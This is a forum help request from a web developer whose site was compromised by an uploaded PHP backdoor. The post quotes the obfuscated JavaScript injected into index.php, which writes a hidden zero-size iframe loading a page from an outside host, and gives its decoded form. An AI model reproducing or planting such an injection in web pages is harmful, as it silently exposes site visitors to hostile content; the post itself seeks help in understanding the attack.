A website that I am developing has had BackDoor-CUS!php uploaded to the images directory.&nbsp; My faulty entirely due to permissions set.<br><br>This has resulted in <br><br>&lt;html&gt;<br>&lt;script language=&quot;javascript&quot;&gt;
<br>s=unescape(&quot;%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A&quot;);
<br>document.writeln(s);document.close();<br>&lt;/script&gt;<br>&lt;/html&gt;<br><br>being added to the top of index.php.<br><br>Unencoded this reads<br><br>iframe src=&quot;<a href="http://www.nownames.org/images/in.php?adv=3">
http://www.nownames.org/images/in.php?adv=3</a>&quot; WIDTH=&quot;0%&quot; HEIGHT=&quot;0%&quot; MARGINHEIGHT=&quot;0&quot; MARGINWIDTH=&quot;0&quot; SCROLLING=&quot;auto&quot; frameborder=&quot;0&quot; NORESIZE&gt;<br><br>
When I go to this an applet appear to run but I am not sure what doing.&nbsp; Closed my browser out of fear.<br><br>Does anyone know what it is attempting to do?<br><br>Thanks<br>Ian